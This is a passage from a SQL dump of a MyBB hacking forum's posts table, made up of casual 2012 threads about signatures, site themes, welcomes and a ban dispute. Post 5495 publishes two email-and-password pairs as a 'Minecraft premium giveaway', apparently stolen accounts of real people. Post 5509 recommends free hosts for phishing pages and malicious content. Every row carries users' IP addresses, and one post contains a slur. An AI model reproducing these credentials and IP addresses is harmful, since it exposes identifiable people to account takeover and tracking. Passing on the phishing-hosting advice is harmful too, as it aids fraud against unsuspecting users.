`message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5475', '603', '5275', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350598755', '[quote=\'ƒ???????????g\' pid=\'5275\' dateline=\'1350543923\'] Oh alright can I check it out? What do you have to pm me it? [/quote] I have PMed you the source, Check your inbox.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'ca7849617ec16740461e0dbbc756d1c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5476', '957', '5386', '9', 'RE: | [ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '3', '??????????¢™', '1350598968', 'Dont really understand it but thanks for sharing this.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'a5702b4101e02c1f19d0e884554f0d2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5477', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '82', 'iTzIpod', '1350599275', 'Doesn\'t work.. Fix your signature and avatar image.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c3301021e66f4b3035ad138223dce442', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5478', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '82', 'iTzIpod', '1350599318', 'I know. I\'m busy with my relationship with my girlfriend and also busy with homework. :/ I try to go on LH everyday.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '11f48569e7c2778feaefe19fb247b0e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5479', '975', '5456', '7', 'RE: how do i insert a pic', '0', '222', 'Exposé', '1350599740', 'I recommend downloading a program called TinyGrab. It\'s easier to get screenshots :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a28324dc2c8f28cef752131af9166ce9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5480', '981', '0', '4', 'Whatsup Holmes.', '0', '278', 'Yoess', '1350600629', 'Hello guys whatsup, Im Yoess 16 years old, live in the Netherlands. Doing the old things, making new mates here. Im also a friend of VirtualLegend. We all make new things happen. Peace!', '82.157.58.115', '1386035827', '0', '0', '278', '1350615056', '1', 'fd4b88fb7977b36ea9b9a2e918711113', '0', '1350615056'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5481', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '228', 'VirtualLegend', '1350600691', 'Welcome to LH Stay Active and HQ', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'cf9d23d69438dabc26dae26f31586194', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5482', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '3', '??????????¢™', '1350600925', 'Welcome to LH, We wish you a nice warm welcome and we hope you enjoy your stay.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'aad40ca578a072350860e4370ee42d39', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5483', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '222', 'Exposé', '1350600971', 'Sup dude welcome to LH and hope you enjoy your stay :d', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '08bc03f6b18d1b05af1acf5628d8f370', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5484', '954', '5371', '35', 'RE: /\\ New Signature | Rate My Graphics !!! /\\', '0', '222', 'Exposé', '1350601220', 'I like it but you should definately change it so it\'s green to match the site :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'f2a242a930a5fe347a66464e7c486ff5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5485', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '222', 'Exposé', '1350601277', 'Just reminding you to make mah sig tmrw :P....thanks broski', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '12814b228a5fb42c01dc48987a27cc7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5486', '978', '5461', '73', 'RE: IOS vs ANDROID', '0', '222', 'Exposé', '1350601389', 'I think ios is better personally but they are both really good', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '0709a587089f2df8c6de2f8e7c5470bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5487', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '257', 'XxTREYZxX', '1350604491', 'welcome my fellow freind stay active and HQ', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '7b208f63e51176b5b6e7d733626f4210', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5488', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350604915', 'yeah i dont know how to sorry its pretty annoying aye', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '844b593366a52ec75d191e8de95c45ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5489', '982', '0', '7', 'GREED', '0', '257', 'XxTREYZxX', '1350605140', 'is greed banned because i hate him he\'s a scammer.LQ poster,a faggot and rep abuses people because he feels like it who agrees that he is a doosh!', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '35356f12fcdb9e20c21d850ebafeffb0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5490', '982', '5489', '7', 'RE: GREED', '0', '100', '??zg???g????61', '1350605623', 'Before calling someone a LQ poster, try to make more HQ posts yourself. I\'m not very fond of Greed either, but it bugs me when people are hypocritical. You used poor grammar, poor punctuation and you miss-spelled douche.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2eebd0516b6b9ac0aeffd9a23aa1a972', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5491', '982', '5490', '7', 'RE: GREED', '0', '257', 'XxTREYZxX', '1350605893', '[quote=\'??zg???g????61\' pid=\'5490\' dateline=\'1350605623\'] Before calling someone a LQ poster, try to make more HQ posts yourself. I\'m not very fond of Greed either, but it bugs me when people are hypocritical. You used poor grammar, poor punctuation and you miss-spelled douche. [/quote] my grammar isn\'t that bad.and same as my spelling', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'b52946eb123997997dd9f79adc6fd7a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5492', '971', '5449', '9', 'RE: EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '100', '??zg???g????61', '1350605918', 'Damn thanks a ton Reload, your threads are always HQ (:', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '3e5f4be199035f93d6a51838f1f15bab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5493', '982', '5489', '7', 'RE: GREED', '0', '100', '??zg???g????61', '1350606238', '--_____--\" No. Just no...', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '8619779cd2770288f9f0a1f2f7d4b540', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5494', '982', '5489', '7', 'RE: GREED', '0', '222', 'Exposé', '1350606282', 'Yes greed is already banned lol....and yeh I think he scammed ....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '1a2aa0786a2b224384ce9cae5859d8cc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5495', '983', '0', '47', 'MC PREMIUM GIVE AWAY', '0', '257', 'XxTREYZxX', '1350606401', 'HEY L33T I\'V GOT TWO MC PREMIUM ACCOUNTS TO GIVE AWAY RULES: Do not change the password here they are: 1. theophile78@hotmail.fr:120697TC 2. thijs.bastiaens@hotmail.com:148818 there they are i could of put some stupid as survey but no i didn\'t have fun with them :)', '203.104.11.11', '-882373877', '1', '0', '257', '1350606425', '1', '244c86fb53d8418f8eec295552813f53', '0', '1350606425'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5496', '982', '5494', '7', 'RE: GREED', '0', '257', 'XxTREYZxX', '1350606492', '[quote=\'ƒ???????????g\' pid=\'5494\' dateline=\'1350606282\'] Yes greed is already banned lol....and yeh I think he scammed .... [/quote] yeah what a dog, who would do that to one another :)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'f7ab046d7e9b4dedcac85a02d45c3c43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5497', '982', '5496', '7', 'RE: GREED', '0', '100', '??zg???g????61', '1350606529', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5496\' dateline=\'1350606492\'] [quote=\'ƒ???????????g\' pid=\'5494\' dateline=\'1350606282\'] Yes greed is already banned lol....and yeh I think he scammed .... [/quote] yeah what a dog, who would do that to one another :) [/quote] Greed would XD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '8288c9815559afe6dea3d22f18746bc1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5498', '982', '5489', '7', 'RE: GREED', '0', '257', 'XxTREYZxX', '1350606880', 'yeah hahah greedy fuck XD', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '22c73e9e585dab6c9bd230d1dc5dbb00', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5499', '896', '4892', '23', 'RE: How to secure your Router', '0', '222', 'Exposé', '1350608178', 'Lmao I could still hack your router but k...:P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a3c30670c22a05ae09ccf31f522c9c41', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5500', '872', '4717', '24', 'RE: Windows Updates, who uses It?', '0', '222', 'Exposé', '1350608209', 'fuck windows updates....god its soooooo annoying when it comes up', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '238a5439c556ce515b17da503dd91efb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5501', '952', '5366', '34', 'RE: A nice clean signature tutorial', '0', '222', 'Exposé', '1350608349', 'Nice tutorial found it to be very interesting :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a3b0362e92f3ab970773b082500fd1e8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5502', '896', '4892', '23', 'RE: How to secure your Router', '0', '257', 'XxTREYZxX', '1350608710', 'thanks for the great tut. i really enjoyed it :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '06fd9a833dabc0f2c404afcc6fec1f9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5503', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '1', 't3h jok3r', '1350608814', 'Welcome to L33T Hacking. Feel free to check out our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] if you have any questions about the site.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a26c1b2967fb1743a1c8b14354b5af76', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5504', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '257', 'XxTREYZxX', '1350608837', 'could i please have a different please the other wasn\'t my style :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '8e546384d87815a7e6cce878d6e50002', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5505', '957', '5386', '9', 'RE: | [ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '257', 'XxTREYZxX', '1350609109', 'thanks for the share appreciated :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'a52f221bc1f646b1eeb17b921ceec898', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5506', '982', '5489', '7', 'RE: GREED', '0', '1', 't3h jok3r', '1350609293', 'Well I\'m closing this thread because I don\'t want people to make fun of him or do name calling. We banned him because he couldn\'t provide any proof, maybe he was not guilty and he was telling the truth that he was infected with a RAT. Also, please fix your spelling and grammar.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e40c75ac33ef31a406b5f6ea77f7bfdb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5507', '973', '5454', '19', 'RE: New HF Logo?', '0', '1', 't3h jok3r', '1350609406', 'Yo for the first 4-6 seconds I thought you wanted me to make that LHs logo but then when I read your title again I was like oh lol. It\'s kinda disgusting but the truth always hurts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9db4896422b725eda4db2d79243e887f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5508', '942', '5277', '49', 'RE: DDos protected hosting?', '0', '1', 't3h jok3r', '1350609639', 'I\'m not going to discuss my security settings out here. I told you once about the hosting and I hate repeating, next time I would recommend you to post in the right section.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f194455bfb1dbc8146dc3463cd036ffd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5509', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '1', 't3h jok3r', '1350609931', 'Nice list, x10hosting and freehostia are good for hosting malicious content for free.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f65761b6a3f08f7ac33f3f0fc69d5530', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5510', '936', '5391', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '1', 't3h jok3r', '1350609964', '[quote=\'iTzIpod\' pid=\'5391\' dateline=\'1350593653\'] Seems legit. Will check it out. Which one is the best? In your opinion? [/quote] The best is my favorite one which is made by jim467.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bf87b88484a64282d94774ce47a8eb0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5511', '958', '5387', '73', 'RE: subway surfers', '0', '1', 't3h jok3r', '1350610028', 'Thanks for the cheats, I play this game almost every night. It\'s similar to temple run but I find TR better.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '225714f4b90b75e8c3514f42c573def5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5512', '973', '5454', '19', 'RE: New HF Logo?', '0', '222', 'Exposé', '1350610141', 'Let\'s try not to spam in the general section. I thought this was going to be a real logo too. Please post this shit somewhere else thanks', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a02e7f48196c3102fa3081e831644e6a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5513', '978', '5461', '73', 'RE: IOS vs ANDROID', '0', '1', 't3h jok3r', '1350610148', 'Damn they both are good. I like both of them, I think Android is better.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c8101bc5f9361a48f0bb61b553808bdf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5514', '972', '5453', '16', 'RE: Social Engineering Package', '0', '1', 't3h jok3r', '1350610256', 'Advices by Defcon are really useful and thanks for the list and pic.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '29a312c5feb5ef59fbc377443000e20c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5515', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '228', 'VirtualLegend', '1350611121', 'Your a Awesome Member Keep it Up !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '59c8d75ff79c2f6b221a204f2f192807', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5516', '983', '5515', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '257', 'XxTREYZxX', '1350611166', '[quote=\'VirtualLegend\' pid=\'5515\' dateline=\'1350611121\'] Your a Awesome Member Keep it Up !!! [/quote] thanks you hope you enjoy :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '6ccd02633e646f21115a0e0fff334a89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5517', '889', '4842', '3', 'RE: Vote for a new theme', '0', '222', 'Exposé', '1350612028', 'Nooooo 3 is very ugly. Iv\'e seen it before on another forum...ewwww. I\'d say let\'s go with 1 :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '59f129e39ea312482d1a0a786d6b2c4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5518', '889', '4842', '3', 'RE: Vote for a new theme', '0', '257', 'XxTREYZxX', '1350612455', 'i defiantly choose 1 but can we work on the award system after this :)', '203.104.11.11', '-882373877', '1', '0', '1', '1350613165', '1', 'd74a759e998a00c8c2c5ba74868cf390', '0', '1350613165'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5519', '945', '5288', '7', 'RE: I dont want.......', '0', '1', 't3h jok3r', '1350612739', 'http://pastebin.com/Vpy0GQtC', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '94ee5d95c8e8e19bf4d37c2a87cecdff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5520', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '1', 't3h jok3r', '1350613030', 'Facebook even tracks too much information.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '25d0872407d4f9c8350a5c1e04dafe4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5523', '975', '5521', '7', 'RE: how do i insert a pic', '0', '257', 'XxTREYZxX', '1350613327', '[quote=\'t3h jok3r\' pid=\'5521\' dateline=\'1350613149\'] [quote=\'R?????zo?\' pid=\'5458\' dateline=\'1350596919\'] use this [code] [img]pic link goes here[/img] [/code] [/quote] Works for me too, I checked your account and it works. [/quote] yeah its all better now thanks for your support i will be closing thread to prevent spam', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'cc055ea5fed2e5531ae7353467ab0869', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5521', '975', '5458', '7', 'RE: how do i insert a pic', '0', '1', 't3h jok3r', '1350613149', '[quote=\'R?????zo?\' pid=\'5458\' dateline=\'1350596919\'] use this [code] [img]pic link goes here[/img] [/code] [/quote] Works for me too, I checked your account and it works.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e7ec66695486ea6b4a616e80ce9f743f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5522', '907', '5388', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350613156', '[quote=\'iTzIpod\' pid=\'5388\' dateline=\'1350593476\'] I actually saw a couple of these on Youtube already. [/quote] Yea but mines was uploaded before yesterday.', '75.22.57.245', '1259747829', '1', '0', '0', '0', '1', 'a2cdf4399351db472f542c0f16b46c8c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5524', '889', '4842', '3', 'RE: Vote for a new theme', '0', '3', '??????????¢™', '1350614856', 'I cant wait till theme 1 is ready for us to use.', '75.22.57.245', '1259747829', '1', '0', '0', '0', '1', 'a23f761fb30bc15dcef09be2ac18432a', '0', '0'); INSERT INTO `mybb_posts` 